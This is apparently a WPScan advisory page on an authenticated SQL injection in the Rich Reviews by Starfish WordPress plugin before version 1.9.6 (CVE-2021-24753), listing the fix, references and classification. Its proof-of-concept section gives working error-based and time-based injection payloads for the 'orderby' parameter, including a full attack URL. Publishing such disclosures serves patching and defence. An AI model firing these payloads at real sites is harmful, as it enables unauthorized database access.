WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Rich Reviews by Starfish < 1.9.6 - Admin+ SQL Injection

Description

The plugin does not properly validate the orderby GET parameter of the pending reviews page before using it in a SQL statement, leading to an authenticated SQL injection issue

Proof of Concept

error-based SQLI: orderby=id AND EXTRACTVALUE(4795,CONCAT(0x5c,0x717a627871,(SELECT (ELT(4795=4795,1))),0x7176707071))
time-based blind SQLI: orderby=id AND (SELECT 1339 FROM (SELECT(SLEEP(5)))Ozmh)

https://example.com/wp-admin/admin.php?page=fp_admin_pending_reviews_page&order=asc&orderby=id+AND+%28SELECT+1339+FROM+%28SELECT%28SLEEP%285%29%29%29Ozmh%29

Affects Plugins

rich-reviews
Fixed in version 1.9.6

References

CVE
CVE-2021-24753
URL
https://plugins.trac.wordpress.org/changeset/2624882/

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

bl4derunner

Submitter

Anton Sarsadskikh

Verified

Yes

WPVDB ID
be7b102f-3982-46bd-a79c-203498f7c820

Timeline

Publicly Published

2021-11-29 (about 10 months ago)

Added

2021-11-29 (about 10 months ago)

Last Updated

2022-04-10 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin